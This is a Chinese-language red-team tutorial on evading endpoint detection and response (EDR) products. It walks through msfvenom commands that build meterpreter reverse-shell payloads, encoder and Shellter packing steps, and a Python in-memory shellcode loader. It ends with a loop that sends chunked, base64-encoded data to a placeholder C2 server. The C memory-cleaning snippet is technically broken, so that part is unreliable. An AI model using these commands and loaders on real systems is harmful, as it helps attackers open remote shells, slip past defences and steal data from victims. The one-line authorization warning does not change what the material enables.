0x01 攻与防的博弈:EDR绕过技术原理
EDR(Endpoint Detection and Response)当前已成为防御方的重要武器,它能实时检测并响应终端设备上的可疑行为。然而,正因为其强大的检测能力,也成为红队行动中不可避免的障碍。作为攻击者,绕过EDR的检测是渗透过程中最关键的一环。
在深入技术细节之前,我们先来了解EDR的核心工作原理。EDR主要从以下几个维度进行检测:
- 基于规则的静态检测:通过特征码扫描识别恶意文件(例如Hash比对、规则匹配)。
- 基于行为的动态检测:分析进程行为,判断是否触发恶意操作(如内存注入、权限提升、系统调用)。
- 内存监控与挂钩:通过DLL注入等技术,在运行时对目标进程的行为进行拦截和分析。
- 网络流量分析:监控终端的网络流量,识别C2通信或数据泄露行为。
绕过EDR的核心理念: 我们针对上面提到的检测机制,从以下几个方面进行对抗:
- 静态检测对抗:通过加壳、混淆、加密等手段隐藏恶意代码特征。
- 行为检测规避:模拟正常行为或对恶意行为进行分段规避,避免触发EDR规则。
- 内存监控绕过:利用内存清洗、无文件攻击等技术躲过EDR的动态监控。
- 流量伪装:使用合法协议(如HTTPS、DNS)进行通信,或通过其他手段隐藏恶意流量。
接下来,我们基于实际攻击场景,深入探讨如何逐步绕过EDR的检测。
---
0x02 伪装成“好人”:免杀载荷构造
环境准备
在本次实验中,我们以Windows 10(开启EDR)作为目标环境,使用Cobalt Strike生成恶意载荷,并通过一系列手段对其进行免杀处理。环境列表如下:
- 攻击机:Kali Linux,搭载Cobalt Strike 4.x
- 目标机:Windows 10,启用某流行EDR(如Carbon Black、CrowdStrike、Defender ATP)
- 工具:msfvenom、Obfuscation工具(PyInstaller、Shellter)、Hex编辑器
确保你有权在目标环境中进行测试!未授权的攻击行为是非法的。
构造初始Payload
我们先通过Cobalt Strike生成一个基础的Stager Payload,供后续操作使用:
<pre><code class="language-bash"># 在Cobalt Strike服务器中生成一个Windows payload msfvenom -p windows/meterpreter/reverse_https LHOST=192.168.1.100 LPORT=443 -f exe > loader.exe</code></pre>
生成的这个loader.exe是原始文件,直接运行大概率会被EDR拦截。接下来我们进入魔改环节。
---
方法一:编码混淆
编码器可以对原始Payload进行重新编码,改变其字节特征,从而躲避静态检测。
<pre><code class="language-bash">msfvenom -p windows/meterpreter/reverse_http LHOST=192.168.1.100 LPORT=443 -e x86/shikata_ga_nai -i 5 -f exe > encoded_loader.exe</code></pre>
-e:指定编码器,这里使用了经典的shikata_ga_nai编码器。-i:重复编码次数,提高混淆强度。
注意:编码次数并非越多越好,过多编码可能引发目标机器的性能问题。
---
方法二:二次封装与加壳
现代EDR对常见的恶意代码特征库非常敏感,简单的编码可能不足以完全绕过。我们可以使用加壳工具将Payload重新封装:
<pre><code class="language-bash">wine Shellter.exe</code></pre>
步骤:
- 运行
Shellter.exe,选择Interactive模式。 - 指定上一步生成的
encoded_loader.exe文件。 - 选择“Stealth”模式,并根据提示完成操作。
原理:加壳工具会在原始文件的基础上插入合法代码段,改变文件的特征,同时动态解密实际的恶意代码。
---
0x03 动态对抗:内存监控的规避术
即使绕过了静态检测,EDR的动态行为监控仍然是一个严峻的挑战。当操作系统运行带有恶意代码的进程时,EDR会实时分析其行为以发现异常。这一部分,我们来探讨如何应对动态检测。
---
技术1:内存清洗与隐匿
EDR通常通过扫描目标进程的内存空间,寻找恶意代码的痕迹。我们可以在载荷执行后,主动清理自身的内存痕迹,降低被发现的可能。
以下为一个具体实现,代码基于C语言:
<pre><code class="language-c">#include <Windows.h>
include <string.h>
void CleanMemory() { // 获取当前进程句柄 HANDLE hProcess = GetCurrentProcess(); // 获取进程基础地址 MEMORY_BASIC_INFORMATION mbi; VirtualQuery(hProcess, &mbi, sizeof(mbi));
// 清空内存空间 memset(mbi.BaseAddress, 0, mbi.RegionSize); }
int main() { // 执行恶意代码(伪示例) MessageBox(NULL, "Malicious Payload Executed!", "EDR Bypass", MB_OK);
// 清除内存痕迹 CleanMemory();
return 0; }</code></pre>
关键点:
- 使用
VirtualQuery获取当前进程的内存区间信息。 - 通过
memset清空内存内容,避免EDR捕捉到恶意代码片段。
---
技术2:无文件攻击
无文件攻击是一种常见的EDR绕过策略,攻击载荷完全驻留在内存中运行,避免写入磁盘。
以下是一个基于Python的无文件攻击示例:
<pre><code class="language-python">import ctypes import base64
你的Shellcode(以Base64形式加载)
shellcode = base64.b64decode("YOUR_BASE64_ENCODED_SHELLCODE_HERE")
分配可执行内存
ptr = ctypes.windll.kernel32.VirtualAlloc(None, len(shellcode), 0x3000, 0x40)
将Shellcode写入分配的内存
ctypes.windll.kernel32.RtlMoveMemory(ptr, shellcode, len(shellcode))
创建线程并执行Shellcode
ctypes.windll.kernel32.CreateThread(None, 0, ptr, None, 0, None)</code></pre>
原理:
- 将恶意代码以Base64形式硬编码到Python脚本中,避免直接存储为可执行文件。
- 利用Windows API在内存中运行恶意代码,绕过文件系统的检查。
---
0x04 绕过网络流量检测
EDR通常会分析网络层流量来检测恶意C2通信行为。以下是两种绕过方法:
---
伪装合法流量
通过常见协议(如HTTPS或DNS)进行通信,将C2流量伪装成合法流量:
- HTTPS:通过Let’s Encrypt获取合法的SSL证书,并加密C2通信。
- DNS:利用DNS隧道技术,将C2通信嵌入到DNS请求中。
流量加密与分块
通过分块发送敏感数据,避免一次性传输触发流量检测规则。例如:
<pre><code class="language-python">import requests import base64
数据切分
data = "Sensitive Data".encode() chunks = [data[i:i+10] for i in range(0, len(data), 10)]
加密传输
for chunk in chunks: encrypted_chunk = base64.b64encode(chunk).decode() requests.post("https://your-c2-server.com", data={"payload": encrypted_chunk})</code></pre>
---
0x05 总结与经验分享
绕过EDR检测并非单点技术,而是一场系统性对抗。从静态免杀到动态规避,从内存清洗到流量伪装,每一个环节都需要精细设计。
个人体会:
- 多层次绕过:单一绕过技术往往效果有限,建议综合使用多种手段。
- 持续更新:EDR厂商的规则更新频繁,攻击方需要不断调整策略。
- 测试环境必不可少:建立一个接近目标环境的测试环境,提前验证免杀效果。
总之,EDR绕过是红队行动中不可或缺的技能,希望本文内容对你有所启发。